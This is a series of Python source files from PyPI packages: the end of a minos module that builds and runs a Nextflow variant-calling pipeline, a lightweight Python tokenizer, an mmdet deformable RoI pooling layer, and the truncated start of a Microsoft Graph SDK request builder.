if nextflow_work_dir is None:
self.nextflow_work_dir = os.path.join(self.output_dir, 'nextflow.work')
else:
self.nextflow_work_dir = os.path.abspath(nextflow_work_dir)
self.force = force
self.nextflow_input_tsv = os.path.join(self.output_dir, 'nextflow.input.tsv')
self.log_file = os.path.join(self.output_dir, 'log.txt')
self.no_run = no_run
self.clean = clean
self.testing = testing
self.variants_per_split = variants_per_split
self.alleles_per_split = alleles_per_split
self.total_splits = total_splits
self.nf_ram_cluster_small_vars = nf_ram_cluster_small_vars
self.nf_ram_gramtools_build_small = nf_ram_gramtools_build_small
self.nf_ram_minos_small_vars = nf_ram_minos_small_vars
self.nf_ram_merge_small_vars = nf_ram_merge_small_vars
self.use_unmapped_reads = use_unmapped_reads
@classmethod
def _load_input_data_tsv(cls, infile):
logging.info('Start reading file ' + infile)
data = []
with open(infile) as f:
for line in f:
try:
vcf_file, *reads_files = line.rstrip().split('\t')
except:
raise Error('Bad line in input TSV file: ' + line.rstrip())
if not(os.path.exists(vcf_file)):
raise Error('VCF file not found: ' + vcf_file)
for reads_file in reads_files:
if not(os.path.exists(reads_file)):
raise Error('Reads file not found: ' + reads_file)
data.append((os.path.abspath(vcf_file), [os.path.abspath(x) for x in reads_files]))
logging.info('Finish reading file ' + infile + '. Loaded ' + str(len(data)) + ' samples')
return data
@classmethod
def _merge_vcf_files(cls, infiles_list, outfile):
'''Reimplementation of bcftools merge. Load all files into
memory, then write output. bcftools opens all files at the same
time, which doesn't work for lots of files'''
vcf_file_data_list_per_sample = []
sample_names = []
header_lines = []
common_first_column_data = []
first_file = True
for filename in infiles_list:
new_data = []
with open(filename) as f_vcf:
for vcf_line in f_vcf:
if vcf_line.startswith('#'):
if first_file and vcf_line.startswith('##'):
header_lines.append(vcf_line.rstrip())
elif vcf_line.startswith('#CHROM'):
fields = vcf_line.rstrip().split('\t')
assert len(fields) == 10
sample_names.append(fields[-1])
else:
first_columns, last_column = vcf_line.rstrip().rsplit('\t', maxsplit=1)
new_data.append(last_column)
if first_file:
common_first_column_data.append(first_columns)
vcf_file_data_list_per_sample.append(new_data)
first_file = False
with open(outfile, 'w') as f:
print(*header_lines, sep='\n', file=f)
print('#CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', *sample_names, sep='\t', file=f)
for i, common_first_data in enumerate(common_first_column_data):
sample_data_cols = [vcf_file_data_list_per_sample[j][i] for j in range(len(vcf_file_data_list_per_sample))]
print(common_first_data, *sample_data_cols, sep='\t', file=f)
@classmethod
def _filter_input_file_for_clustering(cls, infile, outfile):
header_lines, vcf_records = vcf_file_read.vcf_file_to_dict(infile, sort=True, homozygous_only=False, remove_asterisk_alts=True, remove_useless_start_nucleotides=True)
with open(outfile, 'w') as f:
print(*header_lines, sep='\n', file=f)
for ref_name in vcf_records:
for vcf_record in vcf_records[ref_name]:
if 'MISMAPPED_UNPLACEABLE' in vcf_record.FILTER:
continue
if vcf_record.FORMAT is None or 'GT' not in vcf_record.FORMAT:
logging.warning('No GT in vcf record:' + str(vcf_record))
continue
genotype = vcf_record.FORMAT['GT']
genotypes = genotype.split('/')
called_alleles = set(genotypes)
if called_alleles == {'0'} or '.' in called_alleles:
continue
genotypes = sorted([int(x) for x in genotypes])
if len(called_alleles) == 1:
assert 0 not in genotypes
vcf_record.set_format_key_value('GT', '1/1')
vcf_record.ALT = [vcf_record.ALT[int(genotypes[0]) - 1]]
else:
assert len(called_alleles) == 2
vcf_record.set_format_key_value('GT', '0/1')
if 0 in genotypes:
vcf_record.set_format_key_value('GT', '0/1')
vcf_record.ALT = [vcf_record.ALT[genotypes[1] - 1]]
else:
vcf_record.set_format_key_value('GT', '1/2')
vcf_record.ALT = [vcf_record.ALT[genotypes[0] - 1], vcf_record.ALT[genotypes[1] - 1]]
print(vcf_record, file=f)
@classmethod
def _nextflow_helper_process_input_vcf_file(cls, infile, out_small_vars, out_big_vars, out_sample_name, min_large_ref_length):
splitter = vcf_file_split_deletions.VcfFileSplitDeletions(infile, out_small_vars, out_big_vars, min_large_ref_length=min_large_ref_length)
splitter.run()
header_lines = vcf_file_read.get_header_lines_from_vcf_file(infile)
sample_name = vcf_file_read.get_sample_name_from_vcf_header_lines(header_lines)
assert sample_name is not None
max_read_length = None
for line in header_lines:
if line.startswith('##minos_max_read_length='):
max_read_length = int(line.rstrip().split('=')[1])
with open(out_sample_name, "w") as f:
sample_name = vcf_file_read.get_sample_name_from_vcf_file(infile)
assert sample_name is not None
print(sample_name, file=f)
return max_read_length
@classmethod
def _write_nextflow_data_tsv(cls, data, outfile):
with open(outfile, 'w') as f:
print('sample_id', 'vcf_file', 'reads_files', sep='\t', file=f)
for i, (vcf_file, reads_files) in enumerate(data):
print(i, vcf_file, ' '.join(reads_files), sep='\t', file=f)
@classmethod
def _write_nextflow_script(cls, outfile):
with open(outfile, 'w') as f:
print(r'''
params.data_in_tsv = ""
params.ref_fasta = ""
params.min_large_ref_length = 0
params.gramtools_max_read_length = 0
params.gramtools_kmer_size = 0
params.gramtools_build_threads = 1
params.final_outdir = ""
params.testing = false
params.cluster_small_vars_ram = 2
params.gramtools_build_small_vars_ram = 12
params.minos_small_vars_ram = 5
params.pre_cluster_small_vars_merge_ram = 30
params.pre_cluster_small_vars_merge_threads = 1
params.merge_small_vars_ram = 4
params.variants_per_split = 0
params.alleles_per_split = 0
params.total_splits = 0
params.max_alleles_per_cluster = 5000
params.use_unmapped_reads = false
if (params.testing) {
params.pre_cluster_small_vars_merge_threads = 2
}
if (params.use_unmapped_reads) {
use_unmapped_reads = "--use_unmapped_reads"
}
else {
use_unmapped_reads = ""
}
data_in_tsv = file(params.data_in_tsv).toAbsolutePath()
ref_fasta = file(params.ref_fasta).toAbsolutePath()
final_outdir = file(params.final_outdir).toAbsolutePath()
if (!data_in_tsv.exists()) {
exit 1, "Input data TSV file not found: ${params.data_in_tsv} -- aborting"
}
if (!ref_fasta.exists()) {
exit 1, "Reference FASTA file not found: ${params.ref_fasta} -- aborting"
}
if (params.min_large_ref_length < 1) {
exit 1, "Must use option --min_large_ref_length -- aborting"
}
if (params.gramtools_kmer_size < 1) {
exit 1, "Must use option --gramtools_kmer_size -- aborting"
}
if (!final_outdir.exists()) {
exit 1, "Output directory not found: ${params.final_outdir} -- aborting"
}
split_tsv = Channel.from(data_in_tsv).splitCsv(header: true, sep:'\t')
process process_input_vcf_file {
memory '0.5 GB'
input:
val tsv_fields from split_tsv
output:
file("small_vars.${tsv_fields['sample_id']}.vcf") into process_input_vcf_file_out_small
set(val(tsv_fields), file("big_vars.${tsv_fields['sample_id']}.vcf")) into merge_small_and_large_vars_in
set(val(tsv_fields), file("sample_name.${tsv_fields['sample_id']}")) into minos_all_small_vars_tsv_in
stdout into max_read_lengths
"""
#!/usr/bin/env python3
from minos import multi_sample_pipeline
multi_sample_pipeline.MultiSamplePipeline._filter_input_file_for_clustering(
"${tsv_fields.vcf_file}",
'filtered.vcf'
)
max_read_length = multi_sample_pipeline.MultiSamplePipeline._nextflow_helper_process_input_vcf_file(
'filtered.vcf',
"small_vars.${tsv_fields['sample_id']}.vcf",
"big_vars.${tsv_fields['sample_id']}.vcf",
"sample_name.${tsv_fields['sample_id']}",
${params.min_large_ref_length}
)
if max_read_length is None:
print(0, end='')
else:
print(max_read_length, end='')
"""
}
process pre_cluster_small_vars_merge {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.pre_cluster_small_vars_merge_ram * task.attempt}
maxRetries 3
cpus {params.testing? 2 : params.pre_cluster_small_vars_merge_threads}
input:
val(file_list) from process_input_vcf_file_out_small.collect()
output:
file('pre_cluster_small_vars_merge.vcf') into pre_cluster_small_vars_merge_out
"""
#!/usr/bin/env python3
from cluster_vcf_records import vcf_merge
import pyfastaq
ref_seqs = dict()
pyfastaq.tasks.file_to_dict("${ref_fasta}", ref_seqs)
file_list = ["${file_list.join('", "')}"]
vcf_merge.merge_vcf_files(file_list, ref_seqs, "pre_cluster_small_vars_merge.vcf", threads=${params.pre_cluster_small_vars_merge_threads})
"""
}
process cluster_small_vars_vcf {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.cluster_small_vars_ram * task.attempt}
maxRetries 3
input:
file('pre_cluster_small_vars_merge.vcf') from pre_cluster_small_vars_merge_out
output:
file('small_vars_clustered.vcf') into cluster_small_vars_vcf_out
"""
#!/usr/bin/env python3
from cluster_vcf_records import vcf_clusterer
clusterer = vcf_clusterer.VcfClusterer(["pre_cluster_small_vars_merge.vcf"], "${ref_fasta}", "small_vars_clustered.vcf", max_alleles_per_cluster=${params.max_alleles_per_cluster})
clusterer.run()
"""
}
process split_vcfs {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.gramtools_build_small_vars_ram * task.attempt}
maxRetries 3
input:
file('small_vars_clustered.vcf') from cluster_small_vars_vcf_out
val(max_read_length) from max_read_lengths.max()
output:
file('small_vars_clustered.vcf') into minos_adju_splits
file("gramtools.build_dir/split*.vcf") into gramtools_build_small_vars_vcfs mode flatten
"""
#!/usr/bin/env python3
import sys, shutil, glob, os
from minos import gramtools, vcf_chunker
if ${params.gramtools_max_read_length} == 0:
max_read_length = ${max_read_length}
else:
max_read_length = ${params.gramtools_max_read_length}
if max_read_length == 0:
print('Error! max read length could not be inferred from input VCF files. Must use option --gramtools_max_read_length')
sys.exit(1)
total_splits = ${params.total_splits} if ${params.total_splits} > 0 else None
variants_per_split = ${params.variants_per_split} if ${params.variants_per_split} > 0 else None
alleles_per_split = ${params.alleles_per_split} if ${params.alleles_per_split} > 0 else None
print("total_splits", total_splits)
print("variants_per_split", variants_per_split)
print("alleles_per_split", alleles_per_split)
if total_splits is None and variants_per_split is None and alleles_per_split is None:
gramtools.run_gramtools_build(
"gramtools.build_dir",
"small_vars_clustered.vcf",
"${params.ref_fasta}",
max_read_length,
kmer_size=${params.gramtools_kmer_size},
)
else:
chunker = vcf_chunker.VcfChunker(
"gramtools.build_dir",
vcf_infile="small_vars_clustered.vcf",
ref_fasta="${params.ref_fasta}",
variants_per_split=variants_per_split,
alleles_per_split=alleles_per_split,
max_read_length=max_read_length,
total_splits=total_splits,
flank_length=max_read_length,
gramtools_kmer_size=${params.gramtools_kmer_size},
threads=${params.gramtools_build_threads},
)
chunker.make_split_vcf_files()
"""
}
// Parallelised gramtools build. The build chunks will go in same dir as split vcfs
// This is required for `minos adjudicate` so that it recognises that split vcf and build have been done already.
process gramtools_build_chunks{
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.gramtools_build_small_vars_ram * task.attempt}
maxRetries 3
cpus params.gramtools_build_threads
input:
file vcf_split from gramtools_build_small_vars_vcfs
output:
file("gmtools_build_dir") into gramtools_build_small_vars_out
"""
#!/usr/bin/env python3
import sys,os,shutil
from minos import gramtools
sample_id = "${vcf_split}".split(".")[1]
par_dir = os.path.dirname(os.path.realpath("${vcf_split}"))
build_dir = os.path.join(par_dir,"split.{}.gramtools_build".format(sample_id))
os.symlink(par_dir,"./gmtools_build_dir")
gramtools.run_gramtools_build(build_dir, "${vcf_split}", "${params.ref_fasta}", 150, "${params.gramtools_kmer_size}")
"""
}
// Per sample minos adjudicate. Each of this process will run quasimap/infer on each split, and merge the results into one vcf.
process minos_all_small_vars {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.minos_small_vars_ram * task.attempt}
maxRetries 3
input:
file('small_vars_clustered.vcf') from minos_adju_splits
val build_dir from gramtools_build_small_vars_out.collect()
set(val(tsv_fields), file("sample_name.${tsv_fields['sample_id']}")) from minos_all_small_vars_tsv_in
output:
file("small_vars.minos.${tsv_fields['sample_id']}") into minos_all_small_vars_out
"""
sample_name=\$(cat sample_name.${tsv_fields['sample_id']})
minos_outdir=small_vars.minos.${tsv_fields['sample_id']}
minos adjudicate ${use_unmapped_reads} --sample_name \$sample_name --gramtools_build_dir ${build_dir[0]} --reads ${tsv_fields['reads_files'].replaceAll(/ /, " --reads ")} \$minos_outdir ${ref_fasta} "small_vars_clustered.vcf"
"""
}
// This takes the list per-sample vcfs output by minos_all_small_vars
// and merges them into a multi-samp vcf.
process merge_small_vars_vcfs {
memory '1 GB'
publishDir path: final_outdir, mode: 'move', overwrite: true
input:
val(minos_dir_list) from minos_all_small_vars_out.collect()
output:
file('combined_calls.vcf')
"""
#!/usr/bin/env python3
# Files end with .N (N=0,1,2,3,...) Sort numerically on this N
import os
from minos import multi_sample_pipeline
minos_dir_list = ["${minos_dir_list.join('", "')}"]
tuple_list = []
for filename in minos_dir_list:
fields = filename.rsplit('.', maxsplit=1)
tuple_list.append((int(fields[1]), filename))
tuple_list.sort()
filenames = [os.path.join(x[1], 'debug.calls_with_zero_cov_alleles.vcf') for x in tuple_list]
multi_sample_pipeline.MultiSamplePipeline._merge_vcf_files(filenames, 'combined_calls.vcf')
"""
}
''', file=f)
def _make_output_dir(self):
if os.path.exists(self.output_dir):
if self.force:
shutil.rmtree(self.output_dir)
else:
raise Error('Error! Output directory already exists. ' + self.output_dir)
os.mkdir(self.output_dir)
def _prepare_nextflow_input_files(self):
input_data = MultiSamplePipeline._load_input_data_tsv(self.input_data_tsv)
MultiSamplePipeline._write_nextflow_data_tsv(input_data, self.nextflow_input_tsv)
def run(self):
self._make_output_dir()
fh = logging.FileHandler(self.log_file, mode='w')
log = logging.getLogger()
formatter = logging.Formatter('[minos %(asctime)s %(levelname)s] %(message)s', datefmt='%d-%m-%Y %H:%M:%S')
fh.setFormatter(formatter)
log.addHandler(fh)
dependencies.check_and_report_dependencies(programs=['nextflow'])
self._prepare_nextflow_input_files()
original_dir = os.getcwd()
os.chdir(self.output_dir)
nextflow_script = 'nextflow.run.nf'
MultiSamplePipeline._write_nextflow_script(nextflow_script)
logging.info('Prepared nextflow files. cd ' + self.output_dir)
nextflow = dependencies.find_binary('nextflow')
nextflow_command = [
nextflow, 'run',
'-work-dir', self.nextflow_work_dir,
'-with-dag', 'nextflow.out.dag.pdf',
'-with-trace', 'nextflow.out.trace.txt',
]
if self.nextflow_config_file is not None:
nextflow_command.extend(['-c', self.nextflow_config_file])
nextflow_command += [
nextflow_script,
'--ref_fasta', self.ref_fasta,
'--data_in_tsv', self.nextflow_input_tsv,
'--max_alleles_per_cluster', str(self.max_alleles_per_cluster),
'--min_large_ref_length', str(self.min_large_ref_length),
'--final_outdir', self.output_dir,
'--gramtools_max_read_length', str(self.gramtools_max_read_length),
'--cluster_small_vars_ram', str(self.nf_ram_cluster_small_vars),
'--gramtools_build_small_vars_ram', str(self.nf_ram_gramtools_build_small),
'--gramtools_kmer_size', str(self.gramtools_kmer_size),
'--gramtools_build_threads', str(self.gramtools_build_threads),
'--minos_small_vars_ram', str(self.nf_ram_minos_small_vars),
'--merge_small_vars_ram', str(self.nf_ram_merge_small_vars),
]
if self.testing:
nextflow_command.append('--testing')
if self.use_unmapped_reads:
nextflow_command.append('--use_unmapped_reads')
if self.variants_per_split is not None:
nextflow_command.append('--variants_per_split ' + str(self.variants_per_split))
if self.alleles_per_split is not None:
nextflow_command.append('--alleles_per_split ' + str(self.alleles_per_split))
elif self.total_splits is not None:
nextflow_command.append('--total_splits ' + str(self.total_splits))
nextflow_command = ' '.join(nextflow_command)
if self.no_run:
print('Prepared nextflow pipeline. --no_run used, so not running. The nextflow command to run is:')
print(nextflow_command)
return
else:
logging.info('Start running nextflow: ' + nextflow_command)
syscall_process = utils.syscall(nextflow_command)
logging.info('Finish running nextflow. Writing nextflow stdout/stderr to files')
with open('nextflow.stdout', 'w') as f:
print(syscall_process.stdout.rstrip(), file=f)
with open('nextflow.stderr', 'w') as f:
print(syscall_process.stderr.rstrip(), file=f)
logging.info('cd ' + original_dir)
if self.clean:
logging.info('Delete nextflow work directory ' + self.nextflow_work_dir)
shutil.rmtree(self.nextflow_work_dir)
logging.info('Delete .nextflow directory')
shutil.rmtree('.nextflow')
logging.info('Rename .nextflow.log -> nextflow.log')
os.rename('.nextflow.log', 'nextflow.log')
os.chdir(original_dir) | PypiClean |
/pycopy-utokenize-2.0.tar.gz/pycopy-utokenize-2.0/utokenize.py | from token import *
from ucollections import namedtuple
import uio
COMMENT = N_TOKENS + 0
NL = N_TOKENS + 1
ENCODING = N_TOKENS + 2
tok_name[COMMENT] = "COMMENT"
tok_name[NL] = "NL"
tok_name[ENCODING] = "ENCODING"
class TokenInfo(namedtuple("TokenInfo", ("type", "string", "start", "end", "line"))):
def __str__(self):
return "TokenInfo(type=%d (%s), string=%r, startl=%d, line=%r)" % (
self.type, tok_name[self.type], self.string, self.start, self.line
)
def get_indent(l):
for i in range(len(l)):
if l[i] != " " and l[i] != "\t":
return i, l[i:]
def get_str(l, readline):
lineno = 0
s = uio.StringIO()
if l.startswith('"""') or l.startswith("'''"):
sep = l[0:3]
s += sep
l = l[3:]
pos = 0
while True:
i = l.find(sep, pos)
if i >= 0:
if i > 0 and l[i - 1] == "\\":
pos = i + 1
continue
break
s += l
l = readline()
pos = 0
assert l
lineno += 1
s += l[:i + 3]
return s.getvalue(), l[i + 3:], lineno
lbuf = uio.StringIO(l)
sep = lbuf.read(1)
s += sep
while True:
c = lbuf.read(1)
if not c:
break
s += c
if c == "\\":
c = lbuf.read(1)
s += c
if c == "\n":
lbuf = uio.StringIO(readline())
lineno += 1
continue
elif c == sep:
break
return s.getvalue(), lbuf.read(), lineno
def generate_tokens(readline):
indent_stack = [0]
lineno = 0
paren_level = 0
no_newline = False
# generate_tokens() doesn't yield this, only tokenine() does.
#yield TokenInfo(ENCODING, "utf-8", 0, 0, "")
while True:
l = readline()
lineno += 1
org_l = l
if not l:
break
if not l.endswith("\n"):
l += "\n"
no_newline = True
i, l = get_indent(l)
if l == "\n":
yield TokenInfo(NL, l, lineno, 0, org_l)
continue
elif l == "\x0c\n":
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if paren_level == 0:
if i > indent_stack[-1]:
yield TokenInfo(INDENT, org_l[:i], lineno, 0, org_l)
indent_stack.append(i)
elif i < indent_stack[-1]:
while i != indent_stack[-1]:
yield TokenInfo(DEDENT, "", lineno, 0, org_l)
indent_stack.pop()
while l:
if l[0].isdigit() or (l.startswith(".") and len(l) > 1 and l[1].isdigit()):
seen_dot = False
t = ""
if l.startswith("0x") or l.startswith("0X"):
t = "0x"
l = l[2:]
elif l.startswith("0o") or l.startswith("0O"):
t = "0o"
l = l[2:]
elif l.startswith("0b") or l.startswith("0B"):
t = "0b"
l = l[2:]
while l and (l[0].isdigit() or l[0] == "." or l[0] == "_" or (t.startswith("0x") and l[0] in "ABCDEFabcdef")):
if l[0] == ".":
if seen_dot:
break
seen_dot = True
t += l[0]
l = l[1:]
if l.startswith("e") or l.startswith("E"):
t += l[0]
l = l[1:]
if l[0] in ("+", "-"):
t += l[0]
l = l[1:]
while l and (l[0].isdigit() or l[0] == "_"):
t += l[0]
l = l[1:]
if l.startswith("j"):
t += l[0]
l = l[1:]
yield TokenInfo(NUMBER, t, lineno, 0, org_l)
elif l[0].isalpha() or l.startswith("_") or ord(l[0]) >= 0xaa:
name = ""
while l and (l[0].isalpha() or l[0].isdigit() or l.startswith("_") or ord(l[0]) >= 0xaa):
name += l[0]
l = l[1:]
if (l.startswith('"') or l.startswith("'")) and name in ("b", "r", "rb", "br", "u", "f"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, name + s, lineno, 0, org_l)
lineno += lineno_delta
else:
yield TokenInfo(NAME, name, lineno, 0, org_l)
elif l == "\\\n":
l = readline()
lineno += 1
elif l[0] == "\n":
nl = "" if no_newline else "\n"
if paren_level > 0:
yield TokenInfo(NL, nl, lineno, 0, org_l)
else:
yield TokenInfo(NEWLINE, nl, lineno, 0, org_l)
break
elif l[0].isspace():
l = l[1:]
elif l.startswith('"') or l.startswith("'"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, s, lineno, 0, org_l)
lineno += lineno_delta
elif l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
l = "\n"
else:
for op in (
"**=", "//=", ">>=", "<<=", "+=", "-=", "*=", "/=",
"%=", "@=", "&=", "|=", "^=", "**", "//", "<<", ">>",
"==", "!=", ">=", "<=", "...", "->"
):
if l.startswith(op):
yield TokenInfo(OP, op, lineno, 0, org_l)
l = l[len(op):]
break
else:
yield TokenInfo(OP, l[0], lineno, 0, org_l)
if l[0] in ("(", "[", "{"):
paren_level += 1
elif l[0] in (")", "]", "}"):
paren_level -= 1
l = l[1:]
while indent_stack[-1] > 0:
yield TokenInfo(DEDENT, "", lineno, 0, "")
indent_stack.pop()
yield TokenInfo(ENDMARKER, "", lineno, 0, "") | PypiClean |
/CSUMMDET-1.0.23.tar.gz/CSUMMDET-1.0.23/mmdet/ops/dcn/deform_pool.py | import torch
import torch.nn as nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from . import deform_pool_cuda
class DeformRoIPoolingFunction(Function):
@staticmethod
def forward(ctx,
data,
rois,
offset,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0):
# TODO: support unsquare RoIs
out_h, out_w = _pair(out_size)
assert isinstance(out_h, int) and isinstance(out_w, int)
assert out_h == out_w
out_size = out_h # out_h and out_w must be equal
ctx.spatial_scale = spatial_scale
ctx.out_size = out_size
ctx.out_channels = out_channels
ctx.no_trans = no_trans
ctx.group_size = group_size
ctx.part_size = out_size if part_size is None else part_size
ctx.sample_per_part = sample_per_part
ctx.trans_std = trans_std
assert 0.0 <= ctx.trans_std <= 1.0
if not data.is_cuda:
raise NotImplementedError
n = rois.shape[0]
output = data.new_empty(n, out_channels, out_size, out_size)
output_count = data.new_empty(n, out_channels, out_size, out_size)
deform_pool_cuda.deform_psroi_pooling_cuda_forward(
data, rois, offset, output, output_count, ctx.no_trans,
ctx.spatial_scale, ctx.out_channels, ctx.group_size, ctx.out_size,
ctx.part_size, ctx.sample_per_part, ctx.trans_std)
if data.requires_grad or rois.requires_grad or offset.requires_grad:
ctx.save_for_backward(data, rois, offset)
ctx.output_count = output_count
return output
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
if not grad_output.is_cuda:
raise NotImplementedError
data, rois, offset = ctx.saved_tensors
output_count = ctx.output_count
grad_input = torch.zeros_like(data)
grad_rois = None
grad_offset = torch.zeros_like(offset)
deform_pool_cuda.deform_psroi_pooling_cuda_backward(
grad_output, data, rois, offset, output_count, grad_input,
grad_offset, ctx.no_trans, ctx.spatial_scale, ctx.out_channels,
ctx.group_size, ctx.out_size, ctx.part_size, ctx.sample_per_part,
ctx.trans_std)
return (grad_input, grad_rois, grad_offset, None, None, None, None,
None, None, None, None)
deform_roi_pooling = DeformRoIPoolingFunction.apply
class DeformRoIPooling(nn.Module):
def __init__(self,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0):
super(DeformRoIPooling, self).__init__()
self.spatial_scale = spatial_scale
self.out_size = _pair(out_size)
self.out_channels = out_channels
self.no_trans = no_trans
self.group_size = group_size
self.part_size = out_size if part_size is None else part_size
self.sample_per_part = sample_per_part
self.trans_std = trans_std
def forward(self, data, rois, offset):
if self.no_trans:
offset = data.new_empty(0)
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
class DeformRoIPoolingPack(DeformRoIPooling):
def __init__(self,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0,
num_offset_fcs=3,
deform_fc_channels=1024):
super(DeformRoIPoolingPack,
self).__init__(spatial_scale, out_size, out_channels, no_trans,
group_size, part_size, sample_per_part, trans_std)
self.num_offset_fcs = num_offset_fcs
self.deform_fc_channels = deform_fc_channels
if not no_trans:
seq = []
ic = self.out_size[0] * self.out_size[1] * self.out_channels
for i in range(self.num_offset_fcs):
if i < self.num_offset_fcs - 1:
oc = self.deform_fc_channels
else:
oc = self.out_size[0] * self.out_size[1] * 2
seq.append(nn.Linear(ic, oc))
ic = oc
if i < self.num_offset_fcs - 1:
seq.append(nn.ReLU(inplace=True))
self.offset_fc = nn.Sequential(*seq)
self.offset_fc[-1].weight.data.zero_()
self.offset_fc[-1].bias.data.zero_()
def forward(self, data, rois):
assert data.size(1) == self.out_channels
if self.no_trans:
offset = data.new_empty(0)
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
else:
n = rois.shape[0]
offset = data.new_empty(0)
x = deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels, True,
self.group_size, self.part_size,
self.sample_per_part, self.trans_std)
offset = self.offset_fc(x.view(n, -1))
offset = offset.view(n, 2, self.out_size[0], self.out_size[1])
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
class ModulatedDeformRoIPoolingPack(DeformRoIPooling):
def __init__(self,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0,
num_offset_fcs=3,
num_mask_fcs=2,
deform_fc_channels=1024):
super(ModulatedDeformRoIPoolingPack,
self).__init__(spatial_scale, out_size, out_channels, no_trans,
group_size, part_size, sample_per_part, trans_std)
self.num_offset_fcs = num_offset_fcs
self.num_mask_fcs = num_mask_fcs
self.deform_fc_channels = deform_fc_channels
if not no_trans:
offset_fc_seq = []
ic = self.out_size[0] * self.out_size[1] * self.out_channels
for i in range(self.num_offset_fcs):
if i < self.num_offset_fcs - 1:
oc = self.deform_fc_channels
else:
oc = self.out_size[0] * self.out_size[1] * 2
offset_fc_seq.append(nn.Linear(ic, oc))
ic = oc
if i < self.num_offset_fcs - 1:
offset_fc_seq.append(nn.ReLU(inplace=True))
self.offset_fc = nn.Sequential(*offset_fc_seq)
self.offset_fc[-1].weight.data.zero_()
self.offset_fc[-1].bias.data.zero_()
mask_fc_seq = []
ic = self.out_size[0] * self.out_size[1] * self.out_channels
for i in range(self.num_mask_fcs):
if i < self.num_mask_fcs - 1:
oc = self.deform_fc_channels
else:
oc = self.out_size[0] * self.out_size[1]
mask_fc_seq.append(nn.Linear(ic, oc))
ic = oc
if i < self.num_mask_fcs - 1:
mask_fc_seq.append(nn.ReLU(inplace=True))
else:
mask_fc_seq.append(nn.Sigmoid())
self.mask_fc = nn.Sequential(*mask_fc_seq)
self.mask_fc[-2].weight.data.zero_()
self.mask_fc[-2].bias.data.zero_()
def forward(self, data, rois):
assert data.size(1) == self.out_channels
if self.no_trans:
offset = data.new_empty(0)
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
else:
n = rois.shape[0]
offset = data.new_empty(0)
x = deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels, True,
self.group_size, self.part_size,
self.sample_per_part, self.trans_std)
offset = self.offset_fc(x.view(n, -1))
offset = offset.view(n, 2, self.out_size[0], self.out_size[1])
mask = self.mask_fc(x.view(n, -1))
mask = mask.view(n, 1, self.out_size[0], self.out_size[1])
return deform_roi_pooling(
data, rois, offset, self.spatial_scale, self.out_size,
self.out_channels, self.no_trans, self.group_size,
self.part_size, self.sample_per_part, self.trans_std) * mask | PypiClean |
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/identity_governance/entitlement_management/connected_organizations/item/internal_sponsors/get_user_owned_objects/get_user_owned_objects_request_builder.py | from __future__ import annotations
from dataclasses import dataclass
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.response_handler import ResponseHandler
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from . import get_user_owned_objects_post_request_body
from .......models import directory_object
from .......models.o_data_errors import o_data_error
class GetUserOwnedObjectsRequestBuilder():
"""
Provides operations to call the getUserOwnedObjects method.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new GetUserOwnedObjectsRequestBuilder and sets the default values.
Args:
pathParameters: The raw url or the Url template parameters for the request.
requestAdapter: The request adapter to use to execute the requests.
"""
if path_parameters is None:
raise Exception("path_parameters cannot be undefined")
if request_adapter is None:
raise Exception("request_adapter cannot be undefined")
# Url template to use to build the URL for the current request builder
self.url_template: str = "{+baseurl}/identityGovernance/entitlementManagement/connectedOrganizations/{connectedOrganization%2Did}/internalSponsors/getUserOwnedObjects"
url_tpl_params = get_path_parameters(path_parameters)
self.path_parameters = url_tpl_params
self.request_adapter = request_adapter
async def post(self,body: Optional[get_user_owned_objects_post_request_body.GetUserOwnedObjectsPostRequestBody] = None, request_configuration: Optional[GetUserOwnedObjectsRequestBuilderPostRequestConfiguration] = None) -> Optional[directory_object.DirectoryObject]:
"""
Invoke action getUserOwnedObjects
Args:
body: The request body
